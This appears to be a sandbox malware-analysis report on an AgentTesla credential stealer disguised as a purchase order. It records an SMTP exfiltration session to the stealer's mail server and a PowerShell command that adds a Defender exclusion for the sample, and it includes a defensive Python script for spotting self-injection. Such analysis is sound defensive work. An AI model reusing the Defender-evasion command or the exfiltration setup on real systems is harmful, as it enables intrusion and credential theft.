                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):1172
                                                Entropy (8bit):5.354777075714867
                                                Encrypted:false
                                                SSDEEP:24:3gWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NKIl9iagu:QWSU4xympjms4RIoU99tK8NDv
                                                MD5:F614CCA1D985910D63FFFF70966F53F5
                                                SHA1:A9BD00A65E13088BD96A2420E289487CD07D9D4C
                                                SHA-256:3714147C391F57DCDB11C8D0E7076367B3BD1D628A5FB73E2BEE67B99F034157
                                                SHA-512:AE362137DA68C2853EB39BC2EC5A6AD2361689225F28337F0738617D6DB986E4BCF985FE12E910405E621CE407B4E6AF3308ADDDE4F9D81E02F2ED8E27831CAE
                                                Malicious:false
                                                Reputation:moderate, very likely benign file
                                                Preview:@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.709321235727874
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Windows Screen Saver (13104/52) 0.07%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                File name:PURCHASE ORDER-6350-2024.exe
                                                File size:628'736 bytes
                                                MD5:e25b8037dca1fdb8e69cb26bd1cb4f17
                                                SHA1:5a05ef1979ba60a139cb987e7ab3abf1115acba8
                                                SHA256:42db38678ebdd31dbcab40014ff3b96a8b263f77e8484901226defbdfbb8eba6
                                                SHA512:24e783563daf3595dc341c080103976c1a9303f1e7a40418581e5abbb88ace04c341217c7d165e6f36fccd2800108efe454fb6a7acca127a1f8de8b0e2b7f4c1
                                                SSDEEP:12288:UnCgemEOtMBeSoLZTglM5L/O9PVRcVyZIPaCby:qlEj2LZd0tSVjby
                                                TLSH:72D40168165AE603C9A6A7B41A71F5B417780EEEB042D31B9FDC6DEBB967F104C081C3
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,...............0.................. ........@.. ....................................@................................
                                                Icon Hash:00928e8e8686b000
                                                Entrypoint:0x49acc2
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0xC32C0DAC [Thu Oct 5 15:50:04 2073 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                 Instruction
                                                 jmp dword ptr [00402000h]
                                                 add byte ptr [eax], al (this line repeats 97 times: the bytes after the entry-point stub are zero-filled padding, which disassembles as add byte ptr [eax], al)
                                                 Name | Virtual Address | Virtual Size | Is in Section
                                                 IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9ac6e | 0x4f | .text
                                                 IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9c000 | 0x5cc | .rsrc
                                                 IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9e000 | 0xc | .reloc
                                                 IMAGE_DIRECTORY_ENTRY_DEBUG | 0x98600 | 0x70 | .text
                                                 IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                 IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                 IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                 IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                 Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                 .text | 0x2000 | 0x98cc8 | 0x98e00 | f85ffb37abcf8fb7ac1b11ccdd15a555 | False | 0.9007004420482421 | data | 7.717897542519251 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                 .rsrc | 0x9c000 | 0x5cc | 0x600 | 313b5ba415a44557748a2eb5071f1305 | False | 0.4290364583333333 | data | 4.138499463618535 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                 .reloc | 0x9e000 | 0xc | 0x200 | e2ff20f852323764479f73844ab847fc | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                 Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                 RT_VERSION | 0x9c090 | 0x33c | data | | | 0.42995169082125606
                                                 RT_MANIFEST | 0x9c3dc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                 DLL | Import
                                                 mscoree.dll | _CorExeMain
                                                 Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                 2024-10-08T13:52:51.176172+0200 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.5 | 49707 | 199.79.62.115 | 587 | TCP
                                                 2024-10-08T13:52:51.176172+0200 | 2839723 | ETPRO MALWARE Win32/Agent Tesla SMTP Activity | 1 | 192.168.2.5 | 49707 | 199.79.62.115 | 587 | TCP
                                                 2024-10-08T13:52:51.176172+0200 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.5 | 49707 | 199.79.62.115 | 587 | TCP
                                                 2024-10-08T13:53:00.382718+0200 | 2855245 | ETPRO MALWARE Agent Tesla Exfil via SMTP | 1 | 192.168.2.5 | 49707 | 199.79.62.115 | 587 | TCP
                                                 2024-10-08T13:53:00.382718+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49707 | 199.79.62.115 | 587 | TCP
                                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                 Oct 8, 2024 13:52:58.115422010 CEST | 58378 | 53 | 192.168.2.5 | 1.1.1.1
                                                 Oct 8, 2024 13:52:58.543736935 CEST | 53 | 58378 | 1.1.1.1 | 192.168.2.5
                                                 Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                 Oct 8, 2024 13:52:58.115422010 CEST | 192.168.2.5 | 1.1.1.1 | 0x8ee9 | Standard query (0) | mail.mbarieservicesltd.com | A (IP address) | IN (0x0001) | false
                                                 Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                 Oct 8, 2024 13:52:58.543736935 CEST | 1.1.1.1 | 192.168.2.5 | 0x8ee9 | No error (0) | mail.mbarieservicesltd.com | | 199.79.62.115 | A (IP address) | IN (0x0001) | false
                                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                 Oct 8, 2024 13:52:59.278101921 CEST | 587 | 49707 | 199.79.62.115 | 192.168.2.5 | 220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Tue, 08 Oct 2024 17:22:59 +0530
                                                     220-We do not authorize the use of this system to transport unsolicited,
                                                     220 and/or bulk e-mail.
                                                 Oct 8, 2024 13:52:59.279000044 CEST | 49707 | 587 | 192.168.2.5 | 199.79.62.115 | EHLO 932923
                                                 Oct 8, 2024 13:52:59.436537981 CEST | 587 | 49707 | 199.79.62.115 | 192.168.2.5 | 250-md-54.webhostbox.net Hello 932923 [8.46.123.33]
                                                     250-SIZE 52428800
                                                     250-8BITMIME
                                                     250-PIPELINING
                                                     250-PIPECONNECT
                                                     250-AUTH PLAIN LOGIN
                                                     250-STARTTLS
                                                     250 HELP
                                                 Oct 8, 2024 13:52:59.447594881 CEST | 49707 | 587 | 192.168.2.5 | 199.79.62.115 | AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                 Oct 8, 2024 13:52:59.604739904 CEST | 587 | 49707 | 199.79.62.115 | 192.168.2.5 | 334 UGFzc3dvcmQ6
                                                 Oct 8, 2024 13:52:59.891848087 CEST | 587 | 49707 | 199.79.62.115 | 192.168.2.5 | 235 Authentication succeeded
                                                 Oct 8, 2024 13:52:59.892194986 CEST | 49707 | 587 | 192.168.2.5 | 199.79.62.115 | MAIL FROM:<saless@mbarieservicesltd.com>
                                                 Oct 8, 2024 13:53:00.047945976 CEST | 587 | 49707 | 199.79.62.115 | 192.168.2.5 | 250 OK
                                                 Oct 8, 2024 13:53:00.048176050 CEST | 49707 | 587 | 192.168.2.5 | 199.79.62.115 | RCPT TO:<iinfo@mbarieservicesltd.com>
                                                 Oct 8, 2024 13:53:00.225706100 CEST | 587 | 49707 | 199.79.62.115 | 192.168.2.5 | 250 Accepted
                                                 Oct 8, 2024 13:53:00.225895882 CEST | 49707 | 587 | 192.168.2.5 | 199.79.62.115 | DATA
                                                 Oct 8, 2024 13:53:00.382008076 CEST | 587 | 49707 | 199.79.62.115 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
                                                 Oct 8, 2024 13:53:00.382761002 CEST | 49707 | 587 | 192.168.2.5 | 199.79.62.115 | .
                                                 Oct 8, 2024 13:53:00.643548012 CEST | 587 | 49707 | 199.79.62.115 | 192.168.2.5 | 250 OK id=1sy8lw-000v2V-0y
                                                 Oct 8, 2024 13:54:38.128278971 CEST | 49707 | 587 | 192.168.2.5 | 199.79.62.115 | QUIT
                                                 Oct 8, 2024 13:54:38.485599041 CEST | 587 | 49707 | 199.79.62.115 | 192.168.2.5 | 221 md-54.webhostbox.net closing connection


                                                Target ID:0
                                                Start time:07:52:53
                                                Start date:08/10/2024
                                                Path:C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                                                Imagebase:0x680000
                                                File size:628'736 bytes
                                                MD5 hash:E25B8037DCA1FDB8E69CB26BD1CB4F17
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2053479431.0000000003A29000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:true

                                                Target ID:3
                                                Start time:07:52:55
                                                Start date:08/10/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                                                Imagebase:0x920000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:07:52:55
                                                Start date:08/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:07:52:55
                                                Start date:08/10/2024
                                                Path:C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                                                Imagebase:0x100000
                                                File size:628'736 bytes
                                                MD5 hash:E25B8037DCA1FDB8E69CB26BD1CB4F17
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:6
                                                Start time:07:52:55
                                                Start date:08/10/2024
                                                Path:C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe"
                                                Imagebase:0xa00000
                                                File size:628'736 bytes
                                                MD5 hash:E25B8037DCA1FDB8E69CB26BD1CB4F17
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.3264163729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low
                                                Has exited:false
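
                                                The two process entries above are the security-relevant part of this table: Target 5 starts a second copy of the same image (identical path and MD5) as a 32-bit WOW64 process, and only that child (Target 6) carries the AgentTesla and CredentialStealer Yara hits, one of them in a dump whose name encodes base 0x402000 and a protection field of 0x40 while the process's own image is mapped at 0xa00000. The following triage script is an added example, not part of the Joe Sandbox report: it parses the Yara match lines and the process fields shown above and flags a self-spawned process with Yara hits in writable-and-executable memory. It assumes the .sdmp name layout <process index>.<stage>.<dump id>.<base>.<protect>.<state>.<type>.<reserved> and decodes only the protect field with the standard winnt.h PAGE_* values; the parent/child relation is inferred from list order because this section lists no parent ID. The input strings are constructed from the report text above.

```python
import re
from dataclasses import dataclass

# Windows page-protection constants from winnt.h (standard values, not assumptions).
EXECUTABLE_PROTECTIONS = {0x10, 0x20, 0x40, 0x80}  # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
WRITABLE_PROTECTIONS = {0x04, 0x08, 0x40, 0x80}    # PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY

# Assumed layout of a Joe Sandbox .sdmp name (only proc, base and protect are decoded):
#   <process index>.<stage>.<dump id>.<base address>.<protect>.<state>.<type>.<reserved>.sdmp
SDMP_RE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),.*?Source:\s*"
    r"(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})"
    r"(?:\.[0-9A-Fa-f]{8}){3}\.sdmp"
)

# Constructed input: the four "Yara matches" bullets of Target 6, copied from the report above.
YARA_LINES = """
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3266110194.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000006.00000002.3264163729.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.3266110194.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
"""

# Constructed input: the process fields of Target 5 and Target 6 from the table above.
PROCESSES = [
    {"target": 5, "path": r"C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe",
     "md5": "E25B8037DCA1FDB8E69CB26BD1CB4F17", "wow64": False, "imagebase": 0x100000},
    {"target": 6, "path": r"C:\Users\user\Desktop\PURCHASE ORDER-6350-2024.exe",
     "md5": "E25B8037DCA1FDB8E69CB26BD1CB4F17", "wow64": True, "imagebase": 0xA00000},
]


@dataclass(frozen=True)
class YaraHit:
    rule: str
    process_index: int
    base: int
    protect: int

    @property
    def writable_and_executable(self) -> bool:
        return self.protect in EXECUTABLE_PROTECTIONS and self.protect in WRITABLE_PROTECTIONS


def parse_yara_hits(text: str) -> list[YaraHit]:
    """Extract rule, process index, region base and protection from Yara match lines."""
    return [
        YaraHit(rule=m.group("rule").strip(),
                process_index=int(m.group("proc"), 16),
                base=int(m.group("base"), 16),
                protect=int(m.group("protect"), 16))
        for m in SDMP_RE.finditer(text)
    ]


def find_self_injection(processes: list[dict], hits: list[YaraHit]) -> list[dict]:
    """Flag a process whose image path and MD5 match an earlier-listed process (treated
    as its parent) and which has Yara hits in memory that is both writable and executable.
    foreign_image_base is set when such a region lies below the process's own image base,
    which is what a second PE mapped at the default 0x400000 base looks like after hollowing."""
    findings = []
    first_seen: dict[tuple, int] = {}
    for p in processes:
        key = (p["path"].lower(), p["md5"].lower())
        if key not in first_seen:
            first_seen[key] = p["target"]
            continue
        own = [h for h in hits if h.process_index == p["target"]]
        wx = [h for h in own if h.writable_and_executable]
        if wx:
            findings.append({
                "target": p["target"],
                "parent_target": first_seen[key],
                "wow64": p["wow64"],
                "rules": sorted({h.rule for h in own}),
                "wx_regions": sorted(hex(h.base) for h in {h.base: h for h in wx}.values()),
                "foreign_image_base": any(h.base < p["imagebase"] for h in wx),
            })
    return findings


def report() -> list[dict]:
    """Run the check over the constructed inputs from this report."""
    return find_self_injection(PROCESSES, parse_yara_hits(YARA_LINES))


if __name__ == "__main__":
    for finding in report():
        print(finding)
```

                                                On the inputs above this yields a single finding for Target 6: parent Target 5, WOW64 child, rules JoeSecurity_AgentTesla_1, JoeSecurity_AgentTesla_2 and JoeSecurity_CredentialStealer, one writable-and-executable region at 0x402000 below the 0xa00000 image base. The two 0x2D11000/0x2D6A000 hits have protect 0x04 (PAGE_READWRITE) and are treated as heap data, not as injected code.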


                                                  Execution Graph

                                                  Execution Coverage:11.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:117
                                                  Total number of Limit Nodes:9
                                                  execution_graph: 117 nodes in the 0x10e0000, 0x6dc0000 and 0x6dd0000 regions; the remaining nodes carry only internal call edges. Nodes that reach a Windows API:
                                                  • 6dc7c53, 6dc7cc8: GetSystemMetrics
                                                  • 6dc1584, 6dc15a4, 6dc160c, 6dc2c28: GetDoubleClickTime
                                                  • 6dda200: SetTimer
                                                  • 10ed7a8: DuplicateHandle
                                                  • 10e4514, 10e5928: CreateActCtxA
                                                  • 10eaeb8, 10eb100, 10ed034, 10e5d14: GetModuleHandleW
                                                  • 10ed5a6, 10ed635: GetCurrentProcess; 10ed5f8: GetCurrentThread; 10ed693: GetCurrentThreadId
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9faed6eb7ed7abb3590b7d875d7e42c7fdb4e8d478b6b3c2f5ee962c3396edaa
                                                  • Instruction ID: a81a02128a5f119603dd747b9552596eb821ada55383faf2871bb6b413f35c7e
                                                  • Opcode Fuzzy Hash: 9faed6eb7ed7abb3590b7d875d7e42c7fdb4e8d478b6b3c2f5ee962c3396edaa
                                                  • Instruction Fuzzy Hash: A7A22C31E006598FDB25DF68C8546EDB7B2FF89300F1486A9D80AA7351EB74AE85CF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4ebb98c8d01cb644ec6dcc4de64a23a3c66ab7d808541d44cc227c3a088bdb89
                                                  • Instruction ID: e6378fb4c388f0c06e6c643143c37003779deca57b5f9000fd0c27433aa371cf
                                                  • Opcode Fuzzy Hash: 4ebb98c8d01cb644ec6dcc4de64a23a3c66ab7d808541d44cc227c3a088bdb89
                                                  • Instruction Fuzzy Hash: D942E234B01210CFDBA8AF78C85866977FAFF89305B2454AEE607DB368DA35D841DB40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057685940.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dd0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d7c08c117cf48825d2f58f2bdbf134b4e93cdf4b6a604d88cb67d6bb97a5985e
                                                  • Instruction ID: f3415bc5b0a91fcb7b60e8c5551b95039ad8db6da6fd04379bb523b52ebc0c40
                                                  • Opcode Fuzzy Hash: d7c08c117cf48825d2f58f2bdbf134b4e93cdf4b6a604d88cb67d6bb97a5985e
                                                  • Instruction Fuzzy Hash: AB223A30E10219CFCB64EF68D984A9DBBB6FF85300F1585A9E409AB265DB30ED85CF51

                                                  Control-flow Graph

                                                  • Function at 10ed550: basic blocks 10ed550-10ed72d. Calls in block order: GetCurrentProcess (10ed550), GetCurrentThread (10ed5f8), GetCurrentProcess (10ed635), internal call 10ed72f (10ed672), GetCurrentThreadId (10ed693).
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 010ED5DE
                                                  • GetCurrentThread.KERNEL32 ref: 010ED61B
                                                  • GetCurrentProcess.KERNEL32 ref: 010ED658
                                                  • GetCurrentThreadId.KERNEL32 ref: 010ED6B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: be135f16263416ca6295494a85b2ca66ce898b52f748ad3767083e35969b53ff
                                                  • Instruction ID: 94644a8218c3d4299f5809dc5f9465121e0186fcf32448b2708a55a1dd34b8a4
                                                  • Opcode Fuzzy Hash: be135f16263416ca6295494a85b2ca66ce898b52f748ad3767083e35969b53ff
                                                  • Instruction Fuzzy Hash: 805166B09003098FDB14DFAAD548BAEBFF1EF49304F208499D419A7360D7795944CF65

                                                  Control-flow Graph

                                                  • Function at 10ed560: basic blocks 10ed560-10ed72d. Calls in block order: GetCurrentProcess (10ed560), GetCurrentThread (10ed5f8), GetCurrentProcess (10ed635), internal call 10ed72f (10ed672), GetCurrentThreadId (10ed693).
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 010ED5DE
                                                  • GetCurrentThread.KERNEL32 ref: 010ED61B
                                                  • GetCurrentProcess.KERNEL32 ref: 010ED658
                                                  • GetCurrentThreadId.KERNEL32 ref: 010ED6B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2050801380.00000000010E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10e0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 908be721fbfdf4ad46ac031c6cd6701230267dcab6b3afefffd2897ea8a3d02b
                                                  • Instruction ID: fcb450f211d27a5646c140a50ad89afac5bde57d64e1e1bbe90f88a7f1ea85b0
                                                  • Opcode Fuzzy Hash: 908be721fbfdf4ad46ac031c6cd6701230267dcab6b3afefffd2897ea8a3d02b
                                                  • Instruction Fuzzy Hash: D45155B09003098FEB14DFAAD548BAEBBF1FF89304F208459E019A73A0D7799944CF65

                                                  Control-flow Graph

                                                  • Function at 6dc7c4f: basic blocks 6dc7c11-6dc7d22. GetSystemMetrics is called in the 6dc7c53 and 6dc7cc8 blocks.
                                                  APIs
                                                  • GetSystemMetrics.USER32(0000003B), ref: 06DC7CAE
                                                  • GetSystemMetrics.USER32(0000003C), ref: 06DC7CE8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2057650701.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_6dc0000_PURCHASE ORDER-6350-2024.jbxd
                                                  Similarity
                                                  • API ID: MetricsSystem
                                                  • String ID:
                                                  • API String ID: 4116985748-0
                                                  • Opcode ID: 4cc58552fb9dc932af15c3b394bcd56bc65a30772115f8214cae37655c464e83
                                                  • Instruction ID: a2515811ce2a8e057fd761ca5017eb541296a1ffebacd61315a995df3e9cff5b
                                                  • Opcode Fuzzy Hash: 4cc58552fb9dc932af15c3b394bcd56bc65a30772115f8214cae37655c464e83
                                                  • Instruction Fuzzy Hash: 0F31B4B09003498FDB10CFA9D9493EEBFF0EB09324F10845AD159AB251C3795585CFA1

                                                  Control-flow Graph

                                                  • Function at 6e16140: basic blocks 6e16140-6e16219; no API or internal calls, with a loop through the 6e16155-6e16192 blocks.
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2058380748.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false
